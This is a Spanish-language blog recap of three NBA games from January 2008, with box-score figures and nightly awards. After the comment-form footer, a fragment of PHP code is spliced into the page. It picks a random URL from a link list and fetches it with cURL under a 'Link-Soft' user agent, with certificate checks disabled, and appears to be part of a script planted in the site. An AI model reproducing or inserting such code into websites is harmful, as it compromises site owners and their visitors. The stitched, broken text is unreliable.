La crónica (10/01/08)

11 de January de 2008 por MagicJohnson32

La noche del jueves al viernes deparó tres partidos, todos disputados en canchas de la Conferencia Oeste. El primero enfrentó a dos de los más serios candidatos al anillo y finalistas en 2006, Pistons y Spurs, a continuación los Grizzlies ampliaron su cuenta de derrotas en Sacramento y, por último, los Suns, con tres de sus pilares ausentes, cayeron en Salt Lake City.

Vamos con la crónica detallada de lo ocurrido, empezando por el partido más destacado:

Llegaban los Pistons a San Antonio con las urgencias causadas por dos derrotas consecutivas y no pudo ser mejor la respuesta de los de Michigan. Con Rasheed Wallace al frente, los Pistons dominaron a los Spurs desde el inicio, construyeron su ventaja con un parcial 16-0 para acabar el primer cuarto, alcanzaron más tarde los 20 puntos de renta y supieron administrarla cuando los locales trataron de remontar. San Antonio, en el que sólo Duncan jugó a buen nivel (24 puntos, 15 rebotes y 5 asistencias), no se pudo acercar a más de 8 puntos durante la segunda mitad. El mejor de los visitantes fue Sheed, que se fue a 23 puntos, 15 rebotes, 3 asistencias, 3 robos y 2 tapones. Además, Prince y Hamilton se combinaron para 35 puntos con 15 de 29 en tiros y ayudaron a asegurar el 90-80 final.

En Sacramento, los Grizzlies volvieron a perder un partido que tenían ganado. Un triple de Francisco Garcia a falta de 7 segundos puso a los Kings por delante y culminó la remontada de los locales, que marchaban 10 puntos por debajo en el marcador durante el último periodo. Los Grizzlies tuvieron la opción de ganar pero Rudy Gay perdió el balón y Brad Miller anotó dos tiros libres para dejar el tanteo en el 113-116. Gay logró 31 puntos, 7 rebotes, 2 asistencias y 2 robos, Gasol hizo 19-5-2 y Miller anotó 18 puntos con 4 de 5 en triples. Conley y Navarro anotaron en dobles figuras pero, en el caso del internacional español, con muy malos porcentajes de tiro. Por los Kings, hasta cuatro de sus titulares anotaron más de 20 puntos, encabezados por los 28 con 11 rebotes y 7 asistencias de John Salmons.

Por último, los Suns viajaron a Salt Lake City sin tres de sus titulares, Nash (gripe), Hill (apendicitis) y Marion (lesión en el codo), y poco pudieron hacer ante los Jazz, ante los que cayeron por 86-108. Con Okur como jugador más destacado, con 22 puntos y unos sorprendentes 17 rebotes, el equipo de Jerry Sloan se impuso en los dos primeros cuartos y acabó de romper el partido en el tercero con un parcial 12-28. Brewer se fue hasta los 21 puntos, Deron Williams dirigió a su equipo con 11 asistencias y Boozer añadió 18 puntos. Por los de Arizona, Amare brilló con 21-14 y Barbosa logró 25-5-5 pero ningún otro jugador alcanzó los 10 puntos y los Suns se quedaron en un 36% de acierto en el tiro.

Nuestro MVP: Hay jugadores que saben aprovechar su momento para reivindicarse como grandes jugadores.salmonsgrizzlieswin Es lo que parece estar haciendo John Salmons, que, con las lesiones de Bibby y Artest, se ha convertido en el líder de los Kings y suele acabar sus partidos con grandes actuaciones. Hoy, 28 puntos, 11 rebotes y 7 asistencias, cerquita del triple doble.

El rookie de la noche: Mike Conley esta llamado a ser el base del futuro de los Memphis Grizzlies. Después de pasar mucho tiempo lesionado, ha vuelto para intentar enderezar el rumbo de la franquicia y de momento ya ha dado a los seguidores motivos para la esperanza. 15 puntos y 3 asistencias en el partido de hoy.

La sorpresa: Lleva una temporada decepcionante y aunque una gota no hace océano, el partido de hoy le hace acreedor de este galardón. 22 puntos y 17 rebotes en la fácil victoria de los Jazz contra unos mermados Suns. Hablamos, por supuesto, de Mehmet Okur.

La decepción: Este año se estaba mostrando más regular que nunca pero siempre acaban cayendo estos partidos en los que parece que Manu Ginobili esté missing. 3 de 12 en tiros de campo para sólo 9 puntos. Y si Manu está mal, los Spurs lo notan en demasía.

Y, por último, las 10 mejores jugadas de la noche.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>